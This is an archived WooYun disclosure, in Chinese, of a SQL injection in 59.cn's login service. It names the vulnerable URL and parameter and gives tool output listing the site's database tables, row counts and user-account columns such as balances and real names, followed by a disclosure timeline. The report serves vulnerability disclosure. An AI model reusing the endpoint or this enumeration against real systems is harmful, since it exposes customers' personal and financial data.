乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-01-11: 细节已通知厂商并且等待厂商处理中 2016-01-12: 厂商已经确认,细节仅向厂商公开 2016-01-22: 细节向核心白帽子及相关领域专家公开 2016-02-01: 细节向普通白帽子公开 2016-02-11: 细节向实习白帽子公开 2016-02-22: 细节向公众公开
sql注入
存在漏洞:http://59.cn/service/serLogin/w_service_chkLogin.asp?action=chklogin&auser=1
+-------------------------+---------+| Table | Entries |+-------------------------+---------+| dbo.userlogin_log | 1861273 || dbo.A_User_Account | 1470922 || dbo.x59_Account | 1083543 || dbo.integral | 489171 || dbo.points | 489171 || dbo.A_Indent_Domain | 357630 || dbo.adminop_log | 269537 || dbo.A_User_Main | 92310 || dbo.A_User_Level_Price | 91845 || dbo.A_FAQ | 87660 || dbo.Area_View | 79624 || dbo.ProductRemind | 66018 || dbo.B_IPay | 45804 || dbo.A_Domain_ConTact | 26471 || dbo.x59_RegDomain_Log | 19772 || dbo.A_Indent_Host | 18476 || dbo.A_API_UserRecord | 16907 || dbo.tbl_UserAccount | 12647 || dbo.Admin_Log | 10638 || dbo.A_Indent_VPS | 10628 || dbo.w_CheckDomainList | 9049 || dbo.cre_tmp_all | 7722 || dbo.x59_RenDomain_Log | 7627 || dbo.user_log | 7612 || dbo.A_WebHost | 4938 || dbo.A_domain_template | 3985 || dbo.B_CorpMail | 2799 || dbo.aa | 2797 || dbo.A_Indent_SQL | 2640 || dbo.A_Web_Whois | 2292 || dbo.A_Indent_Plat | 2189 || dbo.qk_customer | 1279 || dbo.Agent_sys_config | 1206 || dbo.A_Web_ShopCart | 1159 || dbo.A_Product_Main | 831 || dbo.DomainRemind | 707 || dbo.ShopOrder | 617 || dbo.UserPaFa | 534 || dbo.B_News | 400 || dbo.B_Domain_Contacts | 384 || dbo.HostEfangStopList | 300 || dbo.B_Country | 239 || dbo.ProCard | 206 || dbo.COR_Tmp | 187 || dbo.Agent_FAQ | 176 || dbo.B_AppPool | 166 || dbo.changeHost | 100 || dbo.A_Indent_Email | 75 || dbo.SelectIP | 64 || dbo.Agent_Adv | 61 || dbo.UserPaFaMemo | 60 || dbo.cre_tmp_id_bak | 43 || dbo.A_ICP_Type | 37 || dbo.A_ICP_News | 29 || dbo.nok | 29 || dbo.Administrator | 26 || dbo.qk_codeMap | 26 || dbo.opr_log | 22 || dbo.A_Indent_DNS | 18 || dbo.B_Log_Delete | 18 || dbo.RemindContent | 18 || dbo.w_CheckTotalAccount | 16 || dbo.partner59_info | 15 || dbo.w_CheckDomList | 14 || dbo.A_Indent_API | 13 || dbo.qk_ip | 12 || dbo.W_FAQ | 7 || dbo.knot_log | 6 || dbo.qk_agent | 4 || dbo.A_Indent_Search | 3 || dbo.ICPAccout | 3 || dbo.messages | 3 || dbo.cre_tmp_id | 2 || dbo.x59_Domain_Expied | 2 || dbo.B_Credence_Count | 1 |+-------------------------+---------+Database: vcpTable: dbo.A_User_Account[25 columns]+----------------+----------+| Column | Type |+----------------+----------+| aa | decimal || balance | money || bankDate | datetime || buynum | tinyint || CheckTime | datetime || Credence | nvarchar || DoDate | datetime || estate | nvarchar || Extend | nvarchar || Handle | nvarchar || id | bigint || isknot | char || MoneyDate | datetime || MoneyPayFor | nvarchar || MoneyWay | nvarchar || ParentID | nvarchar || parentPartner | varchar || PartnerProfits | money || remark2 | varchar || source | varchar || TrueId | varchar || TrueName | nvarchar || txtPartner | varchar || UserID | nvarchar || wise | nvarchar |+----------------+----------+Database: vcpTable: dbo.x59_Account[25 columns]+----------------+----------+| Column | Type |+----------------+----------+| aa | decimal || balance | money || bankDate | datetime || buynum | tinyint || CheckTime | datetime || Credence | nvarchar || DoDate | datetime || estate | nvarchar || Extend | nvarchar || Handle | nvarchar || id | bigint || isknot | char || MoneyDate | datetime || MoneyPayFor | nvarchar || MoneyWay | nvarchar || ParentID | nvarchar || parentPartner | varchar || PartnerProfits | money || remark2 | varchar || source | varchar || TrueId | varchar || TrueName | nvarchar || txtPartner | varchar || UserID | nvarchar || wise | nvarchar |+----------------+----------+
dd
危害等级:高
漏洞Rank:18
确认时间:2016-01-12 11:59
感谢提供
暂无